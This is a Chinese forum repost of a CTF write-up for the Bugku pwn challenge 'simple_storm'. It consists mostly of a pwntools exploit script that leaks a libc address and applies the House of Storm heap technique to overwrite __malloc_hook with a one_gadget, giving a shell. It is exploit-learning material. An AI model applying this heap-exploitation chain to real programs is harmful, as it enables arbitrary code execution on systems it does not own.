本文为看雪论坛优秀文章
看雪论坛作者ID:git_91357jnabnsn
题目来自bugku[https://ctf.bugku.com/challenges/detail/id/323.html]
1
2
3
from pwn import *
p = process("./simple_storm")
""" p = remote("114.67.246.176",10901) """
elf = ELF("./simple_storm")
libc = ELF("/root/tools/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6")
pid = proc.pidof(p)
context.log_level = "debug"
def add(size):
p.sendlineafter("Your choice?\n", str(1))
p.sendlineafter("Size?\n", str(size))
def delete(idx):
p.sendlineafter("Your choice?\n", str(2))
p.sendlineafter("Index?\n", str(idx))
def edit(idx, content):
p.sendlineafter("Your choice?\n", str(3))
p.sendlineafter("Index?\n", str(idx))
p.sendlineafter("Content?\n", content)
def show(idx):
p.sendlineafter("Your choice?\n", str(4))
p.sendlineafter("Index?\n", str(idx))
def exit():
p.sendlineafter("Your choice?\n", str(5))
add(0x410)#0
add(0x10)#1 防止合并
add(0x400)#2
add(0x10)#3 防止合并
delete(2)
delete(0)
add(0x410)#4
delete(4)
offset = 0x3c4b78
show(4)
main_arena = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
libc_base = main_arena - offset
print ("libc_base is :",hex(libc_base))
malloc_hook = libc.symbols["__malloc_hook"]+libc_base
print ("malloc_hook is :",hex(malloc_hook))
fake_chunk = malloc_hook - 0x30
print ("fake_chunk is :",hex(fake_chunk))
edit(0,p64(0) + p64(fake_chunk))
edit(2,p64(0) + p64(fake_chunk+ 8) + p64(0) + p64(fake_chunk - 0x18 - 5))
add(0x48)#5
edit(5,(p64(0) * 4) + p64(libc_base + 0x4527a))
add(0x10)
p.interactive()
4
assert (!victim || chunk_is_mmapped (mem2chunk (victim))||ar_ptr == arena_for_chunk (mem2chunk (victim)));
https://a1ex.online/2020/10/07/house-of-storm/
看雪ID:git_91357jnabnsn
https://bbs.pediy.com/user-home-902523.htm
# 往期推荐
1.再探格式化字符串漏洞:CVE-2012-3569 ovftool.exe
2.Android APP漏洞之战——Content Provider漏洞详解
球分享
球点赞
球在看
点击“阅读原文”,了解更多!